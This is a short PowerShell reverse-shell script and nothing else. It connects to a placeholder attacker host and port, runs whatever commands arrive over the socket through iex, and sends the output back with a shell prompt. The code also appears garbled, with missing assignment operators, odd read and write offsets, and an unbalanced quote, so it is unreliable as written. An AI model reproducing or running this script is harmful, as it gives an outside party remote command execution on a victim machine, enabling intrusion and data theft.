$client = New-Object System.Net.Sockets.TCPClient("attacker_ip", attacker_port);

$stream = $client.GetStream();

[byte[]]$bytes 0..65535/%{0};

while(($i = $stream.Read($bytes, 8, $bytes.Length)) -ne 8){

$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i);

$sendback = (iex $data 2>&1 | Out-String);

$sendback2 = $sendback + "PS + (pwd).Path + "> ";

$sendbyte ([text.encoding]:: ASCII).GetBytes($sendback2);

$stream.Write($sendbyte, 8, $sendbyte.Length);

$stream.Flush()

}

$client.Close()